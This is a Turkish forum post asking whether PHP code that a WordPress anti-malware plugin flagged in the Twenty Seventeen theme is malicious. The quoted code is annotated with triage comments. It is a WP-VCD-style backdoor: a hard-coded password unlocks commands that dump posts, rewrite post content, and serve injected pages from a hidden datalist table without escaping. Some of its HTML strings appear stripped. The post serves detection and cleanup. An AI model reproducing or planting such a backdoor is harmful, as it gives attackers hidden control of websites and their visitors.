// Request-driven command handler, flagged by the scanner as injected code.
// It runs only when the request carries both `action` and `password`, and
// `password` equals the hard-coded 32-character hex string (loose == comparison).
// That static string is the only gate: there is no capability check, nonce or
// login requirement in this block. Every branch talks to the database through
// $wpdb, prints a short status, and the block ends in die(), so no normal page
// is rendered for such a request.
//
// Triage notes:
//  - The hard-coded string, the action names and the default error text are
//    usable search strings for other theme and plugin files and for access logs.
//  - The `{prefix}datalist` table used by create_page is not a WordPress core
//    table; its presence in the database is an indicator in its own right.
//  - mysql_escape_string() was removed in PHP 7.0. Unless a replacement is
//    defined elsewhere, the branches that call it stop with a fatal error there.
//  - NOTE(review): the shape (request-gated switch, `case '...';`, die) resembles
//    backdoors reported in WP-VCD-style theme infections - confirm against the
//    scanner signature rather than relying on this resemblance.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '1496a4bb57bcc2189b111e4fb5d80985'))
{
switch ($_REQUEST['action'])
{
// get_all_links: dumps every published post (post_type = post), newest ID first,
// one output line per post.
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
{
$data['code'] = '';

// Captures a delimited section of the post body into $data[code].
// NOTE(review): as shown the pattern has only newlines around the group; the
// marker tags were presumably stripped when this page was extracted - compare
// with the file on disk.
if (preg_match('!
(.*?)
!s', $data['post_content'], $_))
{
$data['code'] = $_[1];
}

// Emits guid, captured section and ID for the row. The empty string separators
// are presumably stripped delimiter tags as well - TODO confirm.
print '1' . $data['guid'] . '' . $data['code'] . '' . $data['ID'] . '' . "\r\n";
}
break;

// set_id_links: rewrites the body of one post. Only `data` is checked with
// isset(); `id` is read without any presence check.
case 'set_id_links';
if (isset($_REQUEST['data']))
{
// Loads the current post_content for the requested ID.
$data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

// Removes any previously delimited section from the body (same pattern caveat
// as in get_all_links).
$post_content = preg_replace('!
(.*?)
!s', '', $data -> post_content);
// When `data` is non-empty, the request-supplied text is appended to the body
// after stripcslashes(); an empty `data` therefore only removes the old section.
if (!empty($_REQUEST['data'])) $post_content = $post_content . '
' . stripcslashes($_REQUEST['data']) . '
';

// Direct UPDATE that sets only post_content. post_modified is not part of this
// statement, so modification dates will not reveal the change; comparing post
// bodies against backups is the more reliable check.
if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
{
print "true";
}
}
break;

// create_page: adds, updates or removes rows in `{prefix}datalist`, keyed by a
// URL path built as "/" followed by the `url` request parameter.
case 'create_page';
if (isset($_REQUEST['remove_page']))
{
// Deletes the row for the given path.
if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
{
print "true";
}
}
elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
{
// Upsert of title, keywords, description, content and full_content, all taken
// from the request. Note the asymmetry: `content` is passed through urldecode()
// only in the ON DUPLICATE KEY UPDATE half, not in the initial INSERT values.
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
{
print "true";
}
}
break;

// Any other action value gets a fixed error marker.
default: print "ERROR_WP_ACTION WP_URL_CD";
}

// Ends the request here; nothing after this block runs for a handled request.
die("");
}


// Page override driven by the `{prefix}datalist` table. The current
// $_SERVER[REQUEST_URI] is looked up in that table; when exactly one row matches,
// the stored row is printed in place of the normal WordPress response and the
// request ends with exit. Visitors to any other URL are unaffected, which is why
// the site can look normal while specific paths serve stored content.
//
// Two output modes, chosen by the row itself:
//  - full_content truthy: the stored `content` is printed as the whole response.
//  - otherwise: title and content are wrapped in a page skeleton that calls
//    wp_head(), get_search_form(), get_sidebar() and get_footer().
// In both modes the stored values pass only through stripslashes(); there is no
// HTML escaping, so any markup or script held in the row is served from the
// site's own origin.
//
// The lookup calls mysql_escape_string(), removed in PHP 7.0. Unless a
// replacement is defined elsewhere, this condition raises a fatal error on
// PHP 7+ for every request that reaches it, which is itself a visible symptom.
//
// NOTE(review): in the else branch most print literals are empty and the line
// that mentions language_attributes() has an unbalanced quote. The HTML inside
// these strings was presumably lost when this page was extracted, so the branch
// is not valid PHP as shown - compare with the file on disk before drawing
// conclusions from it. Cleanup is normally a restore of the theme from a
// known-good copy plus a review of the datalist table and of post bodies.
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
// Second query fetches the full row for the same URI.
$data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
// full_content set: emit the stored content with no surrounding template.
if ($data -> full_content)
{
print stripslashes($data -> content);
}
else
{
print '';
print ' language_attributes();
print ' class="no-js">';
print '';
print ''.stripslashes($data -> title).'';
print '';
print '';
print '';
print '';
print '';
print '';
print '';
wp_head();
print '';
print '';
print '
';
print stripslashes($data -> content);
get_search_form();
get_sidebar();
get_footer();
}

exit;
}


?>



Arkadaşlar, Anti-Malware from GOTMLS.NET eklentisini yükledikten sonra eklenti, Yirmi Onyedi (Twenty Seventeen) temasında yukarıdaki kodları zararlı olarak gördü. Sizce bu kodlar zararlı mı?